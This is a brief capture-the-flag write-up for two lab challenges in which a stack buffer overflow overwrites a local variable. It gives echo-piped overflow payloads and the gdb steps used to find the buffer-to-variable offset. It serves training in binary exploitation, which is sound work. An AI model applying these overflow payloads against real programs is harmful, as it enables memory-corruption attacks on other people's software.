Variable Control¶
Variable Control (easy)¶
As told in the debug output, the win variable is 64 bytes from input buffer and has to be set to 0x6eb781f0
echo -e -n "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xf0\x81\xb7\x6e" | /challenge/binary-exploitation-var-control-w
Variable Controle (hard)¶
-
In gdb,
disas challenge, we get to know:- win is at rbp-0x18 = rbp-24
- lose is at rbp-0x14 = rbp-20
- win has to be changed to 0x5a3c1e5a
-
Set a breakpoint
b *challenge+163, run and give a long string of a's as input info frame-> rbp is at 0x7ffcc2692280x/100xg $rbp-200-> input buffer starts at 0x7ffcc2692230, which is rbp-0x50 = rbp-80-
56 a's followed by desired value:
shell echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x5a\x1e\x3c\x5a" | /challenge/binary-exploitation-var-control